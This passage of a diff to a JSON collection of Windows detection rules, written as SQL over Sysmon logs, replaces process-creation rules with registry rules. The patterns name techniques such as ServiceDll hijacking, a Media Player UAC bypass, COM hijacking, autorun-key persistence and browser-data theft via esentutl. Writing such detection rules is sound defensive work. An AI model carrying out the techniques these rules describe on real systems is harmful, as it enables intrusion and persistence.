'\\' AND EventType = 'SetValue')" ], - "filename": "proc_creation_win_findstr_lnk.yml" + "filename": "registry_set_office_outlook_security_settings.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", + "title": "ServiceDll Hijack", + "id": "612e47e9-8a59-43a6-b404-f48683f45bd6", "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "author": "frack113", + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], "falsepositives": [ - "Unlikely" + "Administrative scripts", + "Installation of a service" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Parameters\\\\ServiceDll' ESCAPE '\\') AND NOT ((Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\Parameters\\\\ServiceDll' ESCAPE '\\' AND Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_public_folder.yml" + "filename": "registry_set_servicedll_hijack.yml" }, { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", + "title": "UAC Bypass Using Windows Media Player - Registry", + "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_wmp.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Scheduled TaskCache Change by Uncommon Program", + "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", + "author": "Syed Hasan (@syedhasan009)", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.t1053.005" + ], "falsepositives": [ - "Software installation" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_taskcache_entry.yml" }, { - "title": "Esentutl Steals Browser Information", - "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", + "title": "Potential Persistence Via Scrobj.dll COM Hijacking", + "id": "fe20dda1-6f37-4379-bbe0-a98d400cae90", "status": "experimental", - "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Legitimate use" + "Legitimate use of the dll." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%InprocServer32\\\\(Default)' ESCAPE '\\' AND Details LIKE 'C:\\\\WINDOWS\\\\system32\\\\scrobj.dll' ESCAPE '\\')" ], - "filename": "proc_creation_win_esentutl_webcache.yml" + "filename": "registry_set_persistence_scrobj_dll.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Running Chrome VPN Extensions via the Registry 2 VPN Extension", + "id": "b64a026b-8deb-4c1d-92fd-98893209dff1", + "status": "test", + "description": "Running Chrome VPN Extensions via the Registry install 2 vpn extension", + "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (Image LIKE '%\\\\7z.exe' ESCAPE '\\' OR Image LIKE '%\\\\7zr.exe' ESCAPE '\\' OR Image LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Software\\\\Wow6432Node\\\\Google\\\\Chrome\\\\Extensions%' ESCAPE '\\' AND TargetObject LIKE '%update\\_url' ESCAPE '\\' AND EventType = 'SetValue' AND (TargetObject LIKE '%fdcgdnkidjaadafnichfpabhfomcebme%' ESCAPE '\\' OR TargetObject LIKE '%fcfhplploccackoneaefokcmbjfbkenj%' ESCAPE '\\' OR TargetObject LIKE '%bihmplhobchoageeokmgbdihknkjbknd%' ESCAPE '\\' OR TargetObject LIKE '%gkojfkhlekighikafcpjkiklfbnlmeio%' ESCAPE '\\' OR TargetObject LIKE '%jajilbjjinjmgcibalaakngmkilboobh%' ESCAPE '\\' OR TargetObject LIKE '%gjknjjomckknofjidppipffbpoekiipm%' ESCAPE '\\' OR TargetObject LIKE '%nabbmpekekjknlbkgpodfndbodhijjem%' ESCAPE '\\' OR TargetObject LIKE '%kpiecbcckbofpmkkkdibbllpinceiihk%' ESCAPE '\\' OR TargetObject LIKE '%nlbejmccbhkncgokjcmghpfloaajcffj%' ESCAPE '\\' OR TargetObject LIKE '%omghfjlpggmjjaagoclmmobgdodcjboh%' ESCAPE '\\' OR TargetObject LIKE '%bibjcjfmgapbfoljiojpipaooddpkpai%' ESCAPE '\\' OR TargetObject LIKE '%mpcaainmfjjigeicjnlkdfajbioopjko%' ESCAPE '\\' OR TargetObject LIKE '%jljopmgdobloagejpohpldgkiellmfnc%' ESCAPE '\\' OR TargetObject LIKE '%lochiccbgeohimldjooaakjllnafhaid%' ESCAPE '\\' OR TargetObject LIKE '%nhnfcgpcbfclhfafjlooihdfghaeinfc%' ESCAPE '\\' OR TargetObject LIKE '%ookhnhpkphagefgdiemllfajmkdkcaim%' ESCAPE '\\' OR TargetObject LIKE '%namfblliamklmeodpcelkokjbffgmeoo%' ESCAPE '\\' OR TargetObject LIKE '%nbcojefnccbanplpoffopkoepjmhgdgh%' ESCAPE '\\' OR TargetObject LIKE '%majdfhpaihoncoakbjgbdhglocklcgno%' ESCAPE '\\' OR TargetObject LIKE '%lnfdmdhmfbimhhpaeocncdlhiodoblbd%' ESCAPE '\\' OR TargetObject LIKE '%eppiocemhmnlbhjplcgkofciiegomcon%' ESCAPE '\\' OR TargetObject LIKE '%cocfojppfigjeefejbpfmedgjbpchcng%' ESCAPE '\\' OR TargetObject LIKE '%foiopecknacmiihiocgdjgbjokkpkohc%' ESCAPE '\\' OR TargetObject LIKE '%hhdobjgopfphlmjbmnpglhfcgppchgje%' ESCAPE '\\' OR TargetObject LIKE '%jgbaghohigdbgbolncodkdlpenhcmcge%' ESCAPE '\\' OR TargetObject LIKE '%inligpkjkhbpifecbdjhmdpcfhnlelja%' ESCAPE '\\' OR TargetObject LIKE '%higioemojdadgdbhbbbkfbebbdlfjbip%' ESCAPE '\\' OR TargetObject LIKE '%hipncndjamdcmphkgngojegjblibadbe%' ESCAPE '\\' OR TargetObject LIKE '%iolonopooapdagdemdoaihahlfkncfgg%' ESCAPE '\\' OR TargetObject LIKE '%nhfjkakglbnnpkpldhjmpmmfefifedcj%' ESCAPE '\\' OR TargetObject LIKE '%jpgljfpmoofbmlieejglhonfofmahini%' ESCAPE '\\' OR TargetObject LIKE '%fgddmllnllkalaagkghckoinaemmogpe%' ESCAPE '\\' OR TargetObject LIKE '%ejkaocphofnobjdedneohbbiilggdlbi%' ESCAPE '\\' OR TargetObject LIKE '%keodbianoliadkoelloecbhllnpiocoi%' ESCAPE '\\' OR TargetObject LIKE '%hoapmlpnmpaehilehggglehfdlnoegck%' ESCAPE '\\' OR TargetObject LIKE '%poeojclicodamonabcabmapamjkkmnnk%' ESCAPE '\\' OR TargetObject LIKE '%dfkdflfgjdajbhocmfjolpjbebdkcjog%' ESCAPE '\\' OR TargetObject LIKE '%kcdahmgmaagjhocpipbodaokikjkampi%' ESCAPE '\\' OR TargetObject LIKE '%klnkiajpmpkkkgpgbogmcgfjhdoljacg%' ESCAPE '\\' OR TargetObject LIKE '%lneaocagcijjdpkcabeanfpdbmapcjjg%' ESCAPE '\\' OR TargetObject LIKE '%pgfpignfckbloagkfnamnolkeaecfgfh%' ESCAPE '\\' OR TargetObject LIKE '%jplnlifepflhkbkgonidnobkakhmpnmh%' ESCAPE '\\' OR TargetObject LIKE '%jliodmnojccaloajphkingdnpljdhdok%' ESCAPE '\\' OR TargetObject LIKE '%hnmpcagpplmpfojmgmnngilcnanddlhb%' ESCAPE '\\' OR TargetObject LIKE '%ffbkglfijbcbgblgflchnbphjdllaogb%' ESCAPE '\\' OR TargetObject LIKE '%kcndmbbelllkmioekdagahekgimemejo%' ESCAPE '\\' OR TargetObject LIKE '%jdgilggpfmjpbodmhndmhojklgfdlhob%' ESCAPE '\\' OR TargetObject LIKE '%bihhflimonbpcfagfadcnbbdngpopnjb%' ESCAPE '\\' OR TargetObject LIKE '%ppajinakbfocjfnijggfndbdmjggcmde%' ESCAPE '\\' OR TargetObject LIKE '%oofgbpoabipfcfjapgnbbjjaenockbdp%' ESCAPE '\\' OR TargetObject LIKE '%bhnhkdgoefpmekcgnccpnhjfdgicfebm%' ESCAPE '\\' OR TargetObject LIKE '%knmmpciebaoojcpjjoeonlcjacjopcpf%' ESCAPE '\\' OR TargetObject LIKE '%dhadilbmmjiooceioladdphemaliiobo%' ESCAPE '\\' OR TargetObject LIKE '%jedieiamjmoflcknjdjhpieklepfglin%' ESCAPE '\\' OR TargetObject LIKE '%mhngpdlhojliikfknhfaglpnddniijfh%' ESCAPE '\\' OR TargetObject LIKE '%omdakjcmkglenbhjadbccaookpfjihpa%' ESCAPE '\\' OR TargetObject LIKE '%npgimkapccfidfkfoklhpkgmhgfejhbj%' ESCAPE '\\' OR TargetObject LIKE '%akeehkgglkmpapdnanoochpfmeghfdln%' ESCAPE '\\' OR TargetObject LIKE '%gbmdmipapolaohpinhblmcnpmmlgfgje%' ESCAPE '\\' OR TargetObject LIKE '%aigmfoeogfnljhnofglledbhhfegannp%' ESCAPE '\\' OR TargetObject LIKE '%cgojmfochfikphincbhokimmmjenhhgk%' ESCAPE '\\' OR TargetObject LIKE '%ficajfeojakddincjafebjmfiefcmanc%' ESCAPE '\\' OR TargetObject LIKE '%ifnaibldjfdmaipaddffmgcmekjhiloa%' ESCAPE '\\' OR TargetObject LIKE '%jbnmpdkcfkochpanomnkhnafobppmccn%' ESCAPE '\\' OR TargetObject LIKE '%apcfdffemoinopelidncddjbhkiblecc%' ESCAPE '\\' OR TargetObject LIKE '%mjolnodfokkkaichkcjipfgblbfgojpa%' ESCAPE '\\' OR TargetObject LIKE '%oifjbnnafapeiknapihcmpeodaeblbkn%' ESCAPE '\\' OR TargetObject LIKE '%plpmggfglncceinmilojdkiijhmajkjh%' ESCAPE '\\' OR TargetObject LIKE '%mjnbclmflcpookeapghfhapeffmpodij%' ESCAPE '\\' OR TargetObject LIKE '%bblcccknbdbplgmdjnnikffefhdlobhp%' ESCAPE '\\' OR TargetObject LIKE '%aojlhgbkmkahabcmcpifbolnoichfeep%' ESCAPE '\\' OR TargetObject LIKE '%lcmammnjlbmlbcaniggmlejfjpjagiia%' ESCAPE '\\' OR TargetObject LIKE '%knajdeaocbpmfghhmijicidfcmdgbdpm%' ESCAPE '\\' OR TargetObject LIKE '%bdlcnpceagnkjnjlbbbcepohejbheilk%' ESCAPE '\\' OR TargetObject LIKE '%edknjdjielmpdlnllkdmaghlbpnmjmgb%' ESCAPE '\\' OR TargetObject LIKE '%eidnihaadmmancegllknfbliaijfmkgo%' ESCAPE '\\' OR TargetObject LIKE '%ckiahbcmlmkpfiijecbpflfahoimklke%' ESCAPE '\\' OR TargetObject LIKE '%macdlemfnignjhclfcfichcdhiomgjjb%' ESCAPE '\\' OR TargetObject LIKE '%chioafkonnhbpajpengbalkececleldf%' ESCAPE '\\' OR TargetObject LIKE '%amnoibeflfphhplmckdbiajkjaoomgnj%' ESCAPE '\\' OR TargetObject LIKE '%llbhddikeonkpbhpncnhialfbpnilcnc%' ESCAPE '\\' OR TargetObject LIKE '%pcienlhnoficegnepejpfiklggkioccm%' ESCAPE '\\' OR TargetObject LIKE '%iocnglnmfkgfedpcemdflhkchokkfeii%' ESCAPE '\\' OR TargetObject LIKE '%igahhbkcppaollcjeaaoapkijbnphfhb%' ESCAPE '\\' OR TargetObject LIKE '%njpmifchgidinihmijhcfpbdmglecdlb%' ESCAPE '\\' OR TargetObject LIKE '%ggackgngljinccllcmbgnpgpllcjepgc%' ESCAPE '\\' OR TargetObject LIKE '%kchocjcihdgkoplngjemhpplmmloanja%' ESCAPE '\\' OR TargetObject LIKE '%bnijmipndnicefcdbhgcjoognndbgkep%' ESCAPE '\\' OR TargetObject LIKE '%lklekjodgannjcccdlbicoamibgbdnmi%' ESCAPE '\\' OR TargetObject LIKE '%dbdbnchagbkhknegmhgikkleoogjcfge%' ESCAPE '\\' OR TargetObject LIKE '%egblhcjfjmbjajhjhpmnlekffgaemgfh%' ESCAPE '\\' OR TargetObject LIKE '%ehbhfpfdkmhcpaehaooegfdflljcnfec%' ESCAPE '\\' OR TargetObject LIKE '%bkkgdjpomdnfemhhkalfkogckjdkcjkg%' ESCAPE '\\' OR TargetObject LIKE '%almalgbpmcfpdaopimbdchdliminoign%' ESCAPE '\\' OR TargetObject LIKE '%akkbkhnikoeojlhiiomohpdnkhbkhieh%' ESCAPE '\\' OR TargetObject LIKE '%gbfgfbopcfokdpkdigfmoeaajfmpkbnh%' ESCAPE '\\' OR TargetObject LIKE '%bniikohfmajhdcffljgfeiklcbgffppl%' ESCAPE '\\' OR TargetObject LIKE '%lejgfmmlngaigdmmikblappdafcmkndb%' ESCAPE '\\' OR TargetObject LIKE '%ffhhkmlgedgcliajaedapkdfigdobcif%' ESCAPE '\\' OR TargetObject LIKE '%gcknhkkoolaabfmlnjonogaaifnjlfnp%' ESCAPE '\\' OR TargetObject LIKE '%pooljnboifbodgifngpppfklhifechoe%' ESCAPE '\\' OR TargetObject LIKE '%fjoaledfpmneenckfbpdfhkmimnjocfa%' ESCAPE '\\' OR TargetObject LIKE '%aakchaleigkohafkfjfjbblobjifikek%' ESCAPE '\\' OR TargetObject LIKE '%dpplabbmogkhghncfbfdeeokoefdjegm%' ESCAPE '\\' OR TargetObject LIKE '%padekgcemlokbadohgkifijomclgjgif%' ESCAPE '\\' OR TargetObject LIKE '%bfidboloedlamgdmenmlbipfnccokknp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_chrome_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "CurrentVersion NT Autorun Keys Modification", + "id": "cbf93e5d-ca6c-4722-8bea-e9119007c248", + "status": "experimental", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\VmApplet%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Userinit%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Taskman%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\Shell%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GpExtensions%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AppSetup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\AlternateShells\\\\AvailableShells%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\IconServiceLib%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Appinit\\_Dlls%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Image File Execution Options%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Font Drivers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Drivers32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Run%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Load%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\DisableExceptionChainValidation' ESCAPE '\\' OR TargetObject LIKE '%\\\\MitigationOptions' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR ((TargetObject LIKE '%\\\\ClickToRunStore\\\\HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\PreviousPolicyAreas%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Winlogon\\\\GPExtensions\\\\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\\\\MaxNoGPOListChangesInterval%' ESCAPE '\\') AND Details IN ('DWORD (0x00000009)', 'DWORD (0x000003c0)')) OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\StandaloneUpdater\\\\OneDriveSetup.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\Delete Cached Update Binary' ESCAPE '\\' AND Details LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /q /c del /q \"C:\\\\Users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\Update\\\\OneDriveSetup.exe\"' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_asep_reg_keys_modification_currentversion_nt.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via TypedPaths", + "id": "086ae989-9ca6-4fe7-895a-759c5544f247", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentImage = '') OR (ParentImage = '') OR (ParentImage = '-')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_typed_paths.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "title": "Disable Microsoft Office Security Features", + "id": 